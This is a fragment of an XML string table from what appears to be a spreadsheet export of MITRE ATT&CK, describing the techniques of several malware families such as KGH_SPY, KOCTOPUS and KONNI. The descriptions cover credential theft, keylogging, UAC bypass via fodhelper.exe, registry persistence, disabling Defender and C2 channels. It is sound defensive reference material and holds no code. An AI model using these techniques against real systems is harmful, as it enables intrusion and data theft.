    <t>[JPIN](https://attack.mitre.org/software/S0201) can send email over SMTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--4dd8150f-e20d-4ed0-a12e-c94641d1ba64</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--d2263afd-2fd3-4f98-96a5-a00e5f33b99e</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running processes.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--2738fdf5-b448-4c28-9918-dec89c31b2fc</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can inject content into lsass.exe to load a module.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--72810e5a-0394-4acc-8c3d-3360df2679ee</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--3c786b4b-b146-4511-b3ca-65fe7c3521e8</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--a6e883cf-6276-47c1-a4a3-be2756d510a2</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain system information such as OS version and disk space.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--ad39bd23-1dd8-4725-bf00-74c0e564215f</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain network information, including DNS, IP, and proxies.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--264e85a3-1ddc-4b68-87fc-c2b96d6ec0e9</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the victim user name.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--7a181608-6005-4d42-b4a2-0e2de8b8ff95</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running services.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--de525077-129a-4d14-8419-6a3d219710a8</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can use the command-line utility cacls.exe to change file permissions.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--1d3892ec-dccb-4ba2-b82c-2c7fcafbdd00</t>
  </si>
  <si>
    <t>relationship--093f8796-b394-490b-8048-115f4ee32959</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to download malicious executables to a compromised host.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--f4e1e921-1436-4fdc-88bc-f3321383e96a</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) can download and execute JavaScript files.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--7667e829-3602-410b-b3ea-614ed8d55607</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has been executed through malicious attachments contained in spearphishing emails.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>relationship--fc193a2e-65ef-483d-908e-482e05340c41</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to download and execute PowerShell scripts.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--fe3cefac-f51b-4bac-b6e1-c4bba1f090a8</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to launch scheduled tasks to establish persistence.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--0327e5d8-877c-4efe-bedc-9807279d74dc</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has been delivered by phishing emails containing malicious Microsoft Excel attachments.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>relationship--a9960bcf-c6aa-411c-80d0-556ec7230b68</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) can download and execute VBScript files.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--72549a7f-7996-4ddc-bcde-a48b1e3d7059</t>
  </si>
  <si>
    <t>S0163</t>
  </si>
  <si>
    <t>Janicab</t>
  </si>
  <si>
    <t>malware--234e7770-99b0-4f65-b983-d3230f76a60b</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured audio and sent it out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>relationship--8b5d4742-35a6-4ab7-993c-e20831ab0020</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a valid AppleDeveloperID to sign the code to get past security restrictions.(Citation: Janicab)</t>
  </si>
  <si>
    <t>relationship--fb3b8f32-0991-4d05-a80d-a4736372ad2a</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a cron job for persistence on Mac devices.(Citation: Janicab)</t>
  </si>
  <si>
    <t>relationship--3ec34d16-a4e6-4fc7-b819-5a041605aa42</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured screenshots and sent them out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>relationship--fc67e15c-ae09-45e1-925f-8a6b0e8ca4ab</t>
  </si>
  <si>
    <t>S0528</t>
  </si>
  <si>
    <t>Javali</t>
  </si>
  <si>
    <t>malware--64122557-5940-4271-9123-25bfc0c693db</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use large obfuscated libraries to hinder detection and analysis.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--21a03de2-8f56-4d49-acd5-531b0075df26</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--1910d7f9-b71c-4a85-80ad-74b6722aa208</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use DLL side-loading to load malicious DLLs into legitimate executables.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--1cd08976-89bc-4626-987f-a47c9c685f68</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can read C2 information from Google Documents and YouTube.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--bcedecdf-e98d-4cf7-84a4-d4769a10858d</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can download payloads from remote C2 servers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--fe518957-8722-498f-8da0-4b5eca466cef</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--cd5d323c-5ec5-4bef-8b8f-2d975a44cbcb</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims clicking links to malicious websites.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--4aaa3063-d1b0-4c13-aa6d-829000f05aec</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used the MSI installer to download and execute malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--900cbabe-4e55-434b-92ae-f458be38852a</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can monitor processes for open browsers and custom banking applications.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--4faef092-6721-408c-9135-70c6ad824a07</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered as malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--d37d5ca7-59f1-4938-83a6-64d30675a386</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered via malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--272e3614-f257-4aff-9938-b03a2f16efbd</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used embedded VBScript to download malicious payloads from C2.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--fbc7300a-9c05-4830-8968-2322772f239d</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can use public cloud-based storage providers for command and control.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--c2178e88-74c3-4bc6-b8c5-f6bbc95fc65a</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--2445349c-0bdb-40a7-acca-03f3908b1f35</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can upload and download files, including second-stage malware.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--2fa47765-a47e-430b-9a88-68db5795f557</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--87406432-7190-4606-980b-441819713d1d</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to delete files off the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--def89c4a-b394-4137-8a96-c794780352f2</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to search for files on the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--30ab931e-9cc1-4e95-a3f5-364be094b54e</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can upload files to the victim’s machine and can download additional payloads.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--30efb3df-f7b4-47f8-9c5a-53a94509c929</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to create Registry entries for storing data under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath&lt;/code&gt;.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--d4f0554e-46bb-4fd5-94e8-900dfe3198cf</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can obtain a list of running processes on the system.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--14639d10-6371-4e84-a637-a0e5846cb053</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can capture screenshots of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--c2888af5-ccdd-43f1-947c-1abd69272ec2</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) uses a customized XOR algorithm to encrypt C2 communications.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--d7cdf423-5fed-4402-b970-f6cf2d8df2bb</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--5823e4cd-e6cb-4e62-8ed2-a0f296128d34</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) gathers the MAC address of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--107713b7-97e8-4cd6-8671-b38f86e02ed0</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can execute shell commands using cmd.exe.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--283ba525-5180-461a-989b-87fc2f896ed7</t>
  </si>
  <si>
    <t>[KEYPLUG](https://attack.mitre.org/software/S1051) can use TLS-encrypted WebSocket Protocol (WSS) for C2.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--ba9380c1-1d2e-4161-8c46-9fc9f793cbd3</t>
  </si>
  <si>
    <t>The [KEYPLUG](https://attack.mitre.org/software/S1051) Windows variant has retrieved C2 addresses from encoded data in posts on tech community forums.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--13111e18-5f34-4925-ba0d-655a1fedeb52</t>
  </si>
  <si>
    <t>[KEYPLUG](https://attack.mitre.org/software/S1051) can decode its configuration file to determine C2 protocols.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--43c68bb8-28e2-4ee0-91aa-ffc16dcc45bc</t>
  </si>
  <si>
    <t xml:space="preserve">
[KEYPLUG](https://attack.mitre.org/software/S1051) can use TCP and KCP (KERN Communications Protocol) over UDP for C2 communication.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--e9500f3a-11d5-46f5-96d8-14313b95142e</t>
  </si>
  <si>
    <t>[KEYPLUG](https://attack.mitre.org/software/S1051) can use a hardcoded one-byte XOR encoded configuration file.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--249e7812-394b-44b0-adb7-d922139f7c38</t>
  </si>
  <si>
    <t>[KEYPLUG](https://attack.mitre.org/software/S1051) has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--e55f295e-3531-4f53-bd0e-2c51994d8b44</t>
  </si>
  <si>
    <t>[KEYPLUG](https://attack.mitre.org/software/S1051) can obtain the current tick count of an infected computer.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--0f38f2dd-e2cf-4571-bb6c-065e50412bac</t>
  </si>
  <si>
    <t>[KEYPLUG](https://attack.mitre.org/software/S1051) has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--0b7f61c3-8600-4da7-bd6e-b304dd338d37</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from WINSCP.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--f48ee432-cc6e-4f34-a8bf-0338c1d796d6</t>
  </si>
  <si>
    <t>08 November 2020</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--59e682dd-3a1f-48ab-8e1f-3fb967676931</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send a file containing victim system information to C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--e75cec16-55e4-471d-ab89-52edf5a7799e</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can decrypt encrypted strings and write them to a newly created folder.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--f2cb5393-d33f-4ee3-a2c0-197c1e032ea5</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can exfiltrate collected information from the host to the C2 server.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--bb72c8e4-4d1b-47c6-ad2d-a345826b5645</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can enumerate files and directories on a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--b567c4eb-669f-4e1b-b3dd-a5f3b9bdf567</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to download and execute code from remote servers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--8f55bbbb-7404-4872-9832-c884297cdbe9</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can perform keylogging by polling the &lt;code&gt;GetAsyncKeyState()&lt;/code&gt; function.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--e7e2eed9-ef15-4b6b-890b-72d2b47ca685</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can save collected system information to a file named "info" before exfiltration.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--dcd2acb8-0f4a-4007-88ec-0962d66399cf</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can harvest data from mail clients.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--ac772e5c-ef7b-433a-bc12-4125635699b1</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key to execute logon scripts.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--89bed5a5-b40c-4d27-87c7-a077d1cb2e59</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has been spread through Word documents containing malicious macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--64a0ef28-3274-4db4-a87d-e2ef4af03c4a</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has masqueraded as a legitimate Windows tool.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--506d7613-59ce-4fa4-90b3-f991691d5b93</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has used encrypted strings in its installer.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--c71b5c0b-5ef4-4c6f-9ad1-d2d59e0a7548</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can execute PowerShell commands on the victim's machine.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--ce8eb6bf-11cc-4d9f-a81a-57bd1422efb1</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect information on installed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--dd4c57df-6ddc-4a41-b1ee-5f72556fc57d</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect drive information from a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--dd67596a-64c6-4dfb-b498-e7d5c1886090</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--a2378103-ad88-4cd2-a135-a0f5c02210da</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set a Registry key to run a cmd.exe command.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--5ced50d7-ea22-41c5-9482-2eb61ac4077d</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from the Windows Credential Manager.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--d041fce9-6e05-4f74-a97e-c71f1b270fb8</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) will perform UAC bypass either through fodhelper.exe or eventvwr.exe.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--d11b6896-16e0-4c02-9c16-0880085010e8</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) can delete created registry keys used for persistence as part of its cleanup procedure.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--b01cdac9-edae-4952-9bba-351d6d7ef5f5</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has obfuscated scripts with the BatchEncryption tool.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--d4c1ae1c-e258-4cce-9047-1557e1bdb680</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has deobfuscated itself before executing its commands.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--03b52236-a63f-4ffe-88bd-15cb5ac69a66</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--7fa49623-f53e-412c-a670-fec891ca6175</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used &lt;code&gt;-WindowsStyle Hidden&lt;/code&gt; to hide the command window.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--5b17eed1-2db5-4c35-b04e-cbb0b7edb8d4</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has executed a PowerShell command to download a file to the system.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--63eceedb-657b-47a0-a437-983aad5d82e0</t>
  </si>
  <si>
    <t xml:space="preserve">[KOCTOPUS](https://attack.mitre.org/software/S0669) has relied on victims clicking a malicious document for execution.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--08c45e87-edef-455d-a15a-4612f2312e29</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has relied on victims clicking on a malicious link delivered via email.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--ad8fcad2-fe74-4795-b369-eb669c75b9b5</t>
  </si>
  <si>
    <t xml:space="preserve">[KOCTOPUS](https://attack.mitre.org/software/S0669) has been disguised as legitimate software programs associated with the travel and airline industries.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--b3dac4f5-b074-41fa-8737-280c3369c73e</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has added and deleted keys from the Registry.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--1aae3796-86d5-4b31-ad21-e1dcc508a3b5</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) can use the `LoadResource` and `CreateProcessW` APIs for execution.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--be75f0ef-a8c8-42ec-b36b-670f7b528dd3</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used PowerShell commands to download additional files.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--c6adf690-07ad-4dbd-964b-0217ea2ce0fd</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--14ab71d4-a158-41f2-82d4-c70f3121fa11</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) can set the AutoRun Registry key with a PowerShell command.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--f1796f08-a663-4189-8bdc-a89ecc13df57</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has been distributed via spearphishing emails with malicious attachments.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--02a8db04-60e6-437c-8f1a-12aff6a13c63</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has been distributed as a malicious link within an email.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--1f8132be-36d7-403e-a3e6-604db01ca3b8</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has checked the OS version using `wmic.exe` and the `find` command.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--55f54b3e-7058-4299-98e8-ab33dd42a6ef</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used VBScript to call wscript to execute a PowerShell command.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--da2dd007-a827-42c9-b387-b8fc1e9950dd</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used `cmd.exe` and batch files for execution.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--61ca0970-5afc-41d3-93e3-2f5ec14c470e</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of retrieving information about the infected system.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--42dc03ec-03fb-4bf0-8f5f-e90d1aacd6e7</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of creating a reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--f3bbff8f-5f4b-40aa-a55f-e3880a582868</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of running WMI queries.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--e8e4b87c-3d30-4627-8060-5b5116d057fc</t>
  </si>
  <si>
    <t>S0356</t>
  </si>
  <si>
    <t>KONNI</t>
  </si>
  <si>
    <t>malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has encrypted data and files prior to exfiltration.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--823fc0fa-1648-40ed-87a3-eec3138eb3dd</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify".(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--36a0199f-bce6-4717-a4e4-ce3d75a7ab1c</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) had a feature to steal data from the clipboard.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--592df85b-8f0b-46c1-87e6-fa48da9c0ead</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>relationship--1cc6adf5-a09d-4878-b816-22af0770d3c1</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--bf5b088a-6d58-41ce-b36d-ff911fe76fb8</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can steal profiles (containing credential information) from Firefox, Chrome, and Opera.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--29403801-cdba-4de9-9b9c-c1295b9eccf6</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has stored collected information and discovered processes in a tmp file.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--2b2e0b6e-10ac-42c0-8d77-3ffc9cc654a7</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</si>
  <si>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</si>
  <si>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relationship--06f8a778-eebf-4d73-86d3-6ebdbf94ce46</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has sent data and files to its C2 server.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)(Citation: Malwarebytes KONNI Evolves Jan 2022)</t>
  </si>
  <si>
    <t>relationship--c6761f22-a8ed-4a9a-8d58-e8eee38ead88</t>
  </si>
  <si>
